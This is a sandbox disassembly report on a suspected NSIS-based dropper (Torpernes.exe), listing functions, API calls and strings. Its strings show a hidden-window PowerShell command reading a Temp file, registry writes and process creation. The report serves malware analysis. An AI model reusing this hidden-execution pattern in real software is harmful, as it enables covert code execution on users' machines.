                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%$damebladets skips modeskaber trillingfdslers tilgodeskrevnelysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallottingeufomaniens taletidens media.
                                            • API String ID: 4209647438-2598664323
                                            • Opcode ID: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction ID: cf63611a73504a8a14adbad67728b55c0939cb45f31c124ce58839b51082c780
                                            • Opcode Fuzzy Hash: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction Fuzzy Hash: AE517F3190021AABCF10DF65D944A9F7BACEF08756F10413BE911BB2C1D7389E51CBA9
                                            Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 603 401752-401777 call 402b3a call 4058db 608 401781-401793 call 405e19 call 405864 lstrcatW 603->608 609 401779-40177f call 405e19 603->609 614 401798-401799 call 4060ad 608->614 609->614 618 40179e-4017a2 614->618 619 4017a4-4017ae call 40615c 618->619 620 4017d5-4017d8 618->620 628 4017c0-4017d2 619->628 629 4017b0-4017be CompareFileTime 619->629 621 4017e0-4017fc call 405a85 620->621 622 4017da-4017db call 405a60 620->622 630 401870-401899 call 4050c1 call 402fa2 621->630 631 4017fe-401801 621->631 622->621 628->620 629->628 645 4018a1-4018ad SetFileTime 630->645 646 40189b-40189f 630->646 632 401852-40185c call 4050c1 631->632 633 401803-401841 call 405e19 * 2 call 405e3b call 405e19 call 4055f5 631->633 643 401865-40186b 632->643 633->618 665 401847-401848 633->665 648 4029d0 643->648 647 4018b3-4018be FindCloseChangeNotification 645->647 646->645 646->647 651 4018c4-4018c7 647->651 652 4029c7-4029ca 647->652 650 4029d2-4029d6 648->650 654 4018c9-4018da call 405e3b lstrcatW 651->654 655 4018dc-4018df call 405e3b 651->655 652->648 661 4018e4-402243 call 4055f5 654->661 655->661 661->650 661->652 665->643 667 40184a-40184b 665->667 667->632
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                            • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,00000000,00000000,"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems,?,?,00000031), ref: 004017B8
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tan$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems$skdeskindene
                                            • API String ID: 1941528284-4228974200
                                            • Opcode ID: f77b84e7394a9015f11e648b34cc823c09b6249128fc9dd50b1177973a1be591
                                            • Instruction ID: fea904f2e10d271746d0f20908cdf77902a72bdc4a53de11320a400de1336617
                                            • Opcode Fuzzy Hash: f77b84e7394a9015f11e648b34cc823c09b6249128fc9dd50b1177973a1be591
                                            • Instruction Fuzzy Hash: 62417271900514BACF11BBB5CC46DEF7679EF05368F20823BF425B11E2D63C8A519AAE
                                            Function 004050C1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 669 4050c1-4050d6 670 4050dc-4050ed 669->670 671 40518d-405191 669->671 672 4050f8-405104 lstrlenW 670->672 673 4050ef-4050f3 call 405e3b 670->673 675 405121-405125 672->675 676 405106-405116 lstrlenW 672->676 673->672 677 405134-405138 675->677 678 405127-40512e SetWindowTextW 675->678 676->671 679 405118-40511c lstrcatW 676->679 680 40513a-40517c SendMessageW * 3 677->680 681 40517e-405180 677->681 678->677 679->675 680->681 681->671 682 405182-405185 681->682 682->671
                                            APIs
                                            • lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                            • lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                            • lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                            • SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri
                                            • API String ID: 2531174081-3536308614
                                            • Opcode ID: 2c58d8ae54bcf29ffa93457a9e6d5bbc16706858763a02d48861774ffb4989ea
                                            • Instruction ID: a155edcc61f39e61e19764dfe73df8d96dc604efb0d9904bed2a7f1a8b5b6fb0
                                            • Opcode Fuzzy Hash: 2c58d8ae54bcf29ffa93457a9e6d5bbc16706858763a02d48861774ffb4989ea
                                            • Instruction Fuzzy Hash: 96217C71D00558BBCB219FA5DD45ADFBFB9EF44350F10806AF944A62A0C6794A418F98
                                            Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 683 4015b9-4015cd call 402b3a call 40590f 688 401614-401617 683->688 689 4015cf-4015eb call 405891 CreateDirectoryW 683->689 691 401646-402197 call 401423 688->691 692 401619-401638 call 401423 call 405e19 SetCurrentDirectoryW 688->692 698 40160a-401612 689->698 699 4015ed-4015f8 GetLastError 689->699 705 4029c7-4029d6 691->705 692->705 706 40163e-401641 692->706 698->688 698->689 702 401607 699->702 703 4015fa-401605 GetFileAttributesW 699->703 702->698 703->698 703->702 706->705
                                            APIs
                                              • Part of subcall function 0040590F: CharNextW.USER32(?,?,00424EB8,?,00405983,00424EB8,00424EB8,?,?,74DF3420,004056C1,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040591D
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 00405922
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 0040593A
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems,?,00000000,000000F0), ref: 00401630
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems, xrefs: 00401623
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems
                                            • API String ID: 3751793516-1539819606
                                            • Opcode ID: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction ID: 262734717bc3bcf7a8c0ce33bb30a7f580439ac1f26dac51a327500c395ab635
                                            • Opcode Fuzzy Hash: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction Fuzzy Hash: 5411C671904104EBCF206FA0CD449AE77B1FF14369B34453BF881B61E1D23D49419A5D
                                            Function 00405AB4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 709 405ab4-405ac0 710 405ac1-405af5 GetTickCount GetTempFileNameW 709->710 711 405b04-405b06 710->711 712 405af7-405af9 710->712 714 405afe-405b01 711->714 712->710 713 405afb 712->713 713->714
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405AD2
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031FD,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405AED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-678247507
                                            • Opcode ID: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction ID: 8be7c4eca50f53f96d3bf9dd8d425998f061e8a75984e32c23608a8539937739
                                            • Opcode Fuzzy Hash: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction Fuzzy Hash: C0F09076B00204BBDB00CF5ADC45E9FBBBCEB95710F10803AEA00E7191E2B0AE40CB64
                                            Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 715 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 722 4029c7-4029d6 715->722 723 40237d-402385 715->723 724 402387-402394 call 402b3a lstrlenW 723->724 725 402398-40239b 723->725 724->725 729 4023ab-4023ae 725->729 730 40239d-4023aa call 402b1d 725->730 733 4023b0-4023ba call 402fa2 729->733 734 4023bf-4023d3 RegSetValueExW 729->734 730->729 733->734 736 4023d5 734->736 737 4023d8-4024b2 RegCloseKey 734->737 736->737 737->722 740 402793-40279a 737->740 740->722
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                            • lstrlenW.KERNEL32(0040A568,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 73d0cf6344bb069a5e851f313c44845f1cd89e4b55743e98affba83dcd389783
                                            • Instruction ID: dd6482d33bfca26aaa8e7f30057c56ab8fb8c99c6207a432b960756be4260044
                                            • Opcode Fuzzy Hash: 73d0cf6344bb069a5e851f313c44845f1cd89e4b55743e98affba83dcd389783
                                            • Instruction Fuzzy Hash: 441193B1A00108BEEB10EFA0DD49EAF777CEB50398F10403AF505B71D0D6B85D419B69
                                            Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 741 401e51-401e62 call 402b3a call 4050c1 call 405590 747 401e67-401e6c 741->747 748 401e72-401e75 747->748 749 402793-40279a 747->749 751 401ec6-401ecf CloseHandle 748->751 752 401e77-401e87 WaitForSingleObject 748->752 750 4029c7-4029d6 749->750 751->750 753 401e97-401e99 752->753 756 401e89-401e95 call 4061bc WaitForSingleObject 753->756 757 401e9b-401eab GetExitCodeProcess 753->757 756->753 758 401eba-401ebd 757->758 759 401ead-401eb8 call 405d60 757->759 758->751 763 401ebf 758->763 759->751 763->751
                                            APIs
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,0040FE60,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                              • Part of subcall function 00405590: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                              • Part of subcall function 00405590: CloseHandle.KERNEL32(?), ref: 004055C6
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: ae2cac8f4d04818200e188493c9ec3520e52d8428438fa66b1f9dd597007ba5f
                                            • Instruction ID: 80c30345ee18bbc14dd8b48d6273e75b475bc77ebba3550ac4fd2fc2a9fefb5a
                                            • Opcode Fuzzy Hash: ae2cac8f4d04818200e188493c9ec3520e52d8428438fa66b1f9dd597007ba5f
                                            • Instruction Fuzzy Hash: 5A115E71910204EBCF109FA0CD859DE7AB5EB04355F24447BE501B62E1D2794992DB99
                                            Function 00405590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                            • CloseHandle.KERNEL32(?), ref: 004055C6
                                            Strings
                                            • Error launching installer, xrefs: 004055A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction ID: be1e6bbd108630f976ef7f5fcce94dc376a16e18e8587d411be4a41be08dbb4f
                                            • Opcode Fuzzy Hash: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction Fuzzy Hash: 46E0B6B4A05209BFEB109B64EC49F7B7BBDEB00704F908521BD15F2290D674A9148A79
                                            Function 004031CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
